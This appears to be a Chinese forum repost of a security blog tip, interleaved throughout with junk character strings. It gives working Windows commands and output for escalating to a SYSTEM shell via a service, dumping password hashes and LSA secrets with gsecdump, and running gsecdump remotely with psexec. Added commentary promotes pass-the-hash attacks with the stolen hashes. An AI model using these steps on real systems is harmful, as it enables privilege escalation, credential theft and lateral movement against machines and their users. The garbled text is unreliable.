o get a DOS Prompt as NT system:
" K6 {: J! a' p% F) `( N* l
# z9 l1 l( W1 ~) X! UC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact# e$ _7 _4 Q0 B7 w8 J7 y
[SC] CreateService SUCCESS+ D H; E% f; T% ~3 f! u
# \4 D1 f6 ~$ d
C:\>sc start shellcmdline- y8 Y8 Y" S) Q
[SC] StartService FAILED 1053:* |5 L* g; @1 `% G; Z2 t
6 G, {& @( ^' ]' w" k/ D
The service did not respond to the start or control request in a timely fashion.$ n. y" Z4 c! W9 L4 V- Y% t2 h3 Z
- n* h3 H, B9 u( L) ?1 bC:\>sc delete shellcmdline6 D, I$ A' h- W, I# K o: t
[SC] DeleteService SUCCESS; ?5 j) o7 t( t) |
" o. Z; T& Z0 Z) K5 V. t------------
1 \% W, n+ ^$ \8 ^1 ^
( y' a4 O& e; t* IThen in the new DOS window:2 f8 N2 B' i5 I
2 ~# |) z- O7 k# E* nMicrosoft Windows XP [Version 5.1.2600]! ^ D; Z$ k% a+ Z& S: h7 A
(C) Copyright 1985-2001 Microsoft Corp.# A, P! J0 ]' V; D) C
% Y; u) s1 k% ~8 L! {! W4 ~
C:\WINDOWS\system32>whoami
+ Z4 v5 @* H" KNT AUTHORITY\SYSTEM# U" V0 J& b& N3 D2 ]
) ]- B- U* J& h, y; mC:\WINDOWS\system32>gsecdump -h% e1 Q; @$ h9 P0 t& r: b2 V
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
) V4 P7 f# W1 d, P8 I3 e" X& Busage: gsecdump [options]
! g( {9 m; J0 `+ L; Q
3 l' c$ f& b+ m$ L! x" Doptions:
# D+ d) M! [# l; I5 `-h [ --help ] show help
) a& x& R+ G7 j: y9 t. G) d6 C3 H-a [ --dump_all ] dump all secrets
; j! N5 H) M7 n8 O$ f9 L6 b-l [ --dump_lsa ] dump lsa secrets
& C' {& I/ |. [9 G3 p-w [ --dump_wireless ] dump microsoft wireless connections8 @* e' |+ m- _
-u [ --dump_usedhashes ] dump hashes from active logon sessions( [' M$ o: e' C' _- D s
-s [ --dump_hashes ] dump hashes from SAM/AD7 O4 L9 R) M1 s/ @. P9 `
4 b% z4 O4 p) k4 w3 ?Although I like to use:
$ v8 x5 p) G# @. t& \" k
6 Z4 D$ n! c F3 s# O2 e/ nPsExec v1.83 - Execute processes remotely
, c6 L, P# k N4 b+ q6 GCopyright (C) 2001-2007 Mark Russinovich$ T5 Z( c* v# A C9 k c
Sysinternals - 链接标记[url]www.sysinternals.com[/url]( ~- K$ _6 J; k: I4 T1 Q
; ?. C# O5 c4 y: i' j
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
! i8 x4 Y$ y6 V9 q) V: E! t7 g* m8 ~
to get the hashes from active logon sessions of a remote system.' O- K( p( j# I* m- {3 b2 A. e
& O7 B7 s% R1 F: }
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.6 P2 q5 u1 h# \. n
1 A7 X R" C* p提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
: I. W" H! z7 c9 O0 x8 a- ]3 D' T原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]1 E" R7 l$ _) U- H+ k3 U2 p% K
$ N I1 L5 d' q0 s0 Q8 M, |我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
/ O; T, M' W2 @! q |